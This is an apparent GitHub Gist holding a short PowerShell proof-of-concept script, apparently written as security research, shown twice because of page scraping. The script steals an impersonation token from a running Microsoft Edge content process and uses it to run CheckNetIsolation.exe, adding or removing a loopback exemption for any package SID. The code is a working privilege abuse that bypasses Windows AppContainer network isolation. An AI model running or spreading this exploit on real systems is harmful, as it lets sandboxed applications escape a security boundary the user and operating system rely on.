tyranid/add_loopback_exemption.ps1 Secret

## add_loopback_exemption.ps1
# Add an arbitrary loopback exemption by abusing the Microsoft Edge backdoor.

param(
    [Parameter(Mandatory)]
    [string]$Sid,
    [switch]$Delete
)

Import-Module NtObjectManager

$token = Use-NtObject($ps = Get-NtProcess -Name 'MicrosoftEdgeCP.exe') {
    $p = $ps | Select-Object -First 1
    if ($null -eq $p) {
        Write-Host "Microsoft Edge must be running"
        exit
    }
    Get-NtToken -Primary -Process $p -Duplicate -ImpersonationLevel Impersonation
}

Use-NtObject($token) {
    if ($Delete) {
        $cmd = "-d"
    } else {
        $cmd = "-a"
    }
    Use-NtObject($proc = New-Win32Process "CheckNetIsolation.exe LoopbackExempt $cmd -p=$Sid" -CreationFlags Suspended, NewConsole) {
        $proc.Thread.SetImpersonationToken($token)
        $proc.Process.Resume()
        $proc.Process.Wait() | Out-Null
        $exitcode = $proc.Process.ExitStatus
        if ($exitcode -ne 0) {
            Write-Host "Error adding loopback exemption (exitcode: $exitcode)"
        }
    }
}
	# Add an arbitrary loopback exemption by abusing the Microsoft Edge backdoor.

	param(
	[Parameter(Mandatory)]
	[string]$Sid,
	[switch]$Delete
	)

	Import-Module NtObjectManager

	$token = Use-NtObject($ps = Get-NtProcess -Name 'MicrosoftEdgeCP.exe') {
	$p = $ps \| Select-Object -First 1
	if ($null -eq $p) {
	Write-Host "Microsoft Edge must be running"
	exit
	}
	Get-NtToken -Primary -Process $p -Duplicate -ImpersonationLevel Impersonation
	}

	Use-NtObject($token) {
	if ($Delete) {
	$cmd = "-d"
	} else {
	$cmd = "-a"
	}
	Use-NtObject($proc = New-Win32Process "CheckNetIsolation.exe LoopbackExempt $cmd -p=$Sid" -CreationFlags Suspended, NewConsole) {
	$proc.Thread.SetImpersonationToken($token)
	$proc.Process.Resume()
	$proc.Process.Wait() \| Out-Null
	$exitcode = $proc.Process.ExitStatus
	if ($exitcode -ne 0) {
	Write-Host "Error adding loopback exemption (exitcode: $exitcode)"
	}
	}
	}